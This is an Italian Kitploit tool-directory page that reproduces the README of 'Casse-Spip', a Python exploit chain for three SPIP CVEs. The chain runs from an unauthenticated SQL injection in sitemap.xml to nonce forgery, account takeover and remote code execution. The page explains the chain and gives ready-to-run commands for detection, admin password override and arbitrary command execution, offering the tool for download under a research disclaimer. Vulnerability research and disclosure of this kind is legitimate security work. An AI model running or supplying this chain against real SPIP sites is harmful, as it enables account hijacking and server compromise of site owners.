Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
spip-exploits — Catena di exploit Python per le CVE SPIP 2026-72708/72709/72710, che concatena SQL injection non autenticata fino all'acquisizione dell'account e all'esecuzione di codice in remoto. | Kitploit
Strumenti/GitHubGitHub/ambionics/spip-exploits
Framework di ExploitAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingPaper e Ricerca
GitHubambionics/spip-exploits

spip-exploits

Catena di exploit Python per le CVE SPIP 2026-72708/72709/72710, che concatena SQL injection non autenticata fino all'acquisizione dell'account e all'esecuzione di codice in remoto.

Vedi Repository
11 giorno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Casse-Spip (CVE-2026-72708, CVE-2026-72709, CVE-2026-72710)

Da un'SQL Injection non autenticata al Remote Code Execution

Exploit per CVE-2026-72708, CVE-2026-72709 e CVE-2026-72710 scoperto da Franck Chevalier (Wayko)

Per un'analisi tecnica completa, leggi l'articolo completo sul blog di Lexfo.

Disclaimer

Questo repository è fornito esclusivamente a scopo di ricerca e sicurezza difensiva. L'autore non si assume alcuna responsabilità per l'uso improprio di queste informazioni.


Panoramica

Il punto di ingresso è un'SQL injection nella pagina pubblica sitemap.xml per estrarre alea_ephemere.

Con quel segreto, è possibile forgiare nonce validi per azioni anonime.

Da lì, due azioni portano all'RCE:

  • action=editer_auteur account takeover, poi RCE dall'area privata.
  • action=editer_objet mass assignment, per scrivere una riga nella coda spip_jobs, poi eseguirla tramite action=cron.

Sfruttamento

Setup

root@kitploit:~
python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 casse-spip.py --help

Rilevamento

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000

Catena completa 1 : Account Takeover (CVE-2026-72708 > CVE-2026-72709)

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"

Prima di sovrascrivere, --ato estrae il login del target e l'hash pass corrente (tramite l'SQLi) così puoi ripristinarli in seguito con --restore-hash:

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1

Catena completa 2 : RCE (CVE-2026-72708 > CVE-2026-72709 > CVE-2026-72710)

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"

Il file verrà scritto in IMG/casse-spip_<token>.html.


Riferimenti

  • Post del blog - Analisi tecnica approfondita
  • Vulncheck - Dettagli della vulnerabilità
  • CVE-2026-72708
  • CVE-2026-72709
  • CVE-2026-72710
Scarica lo strumento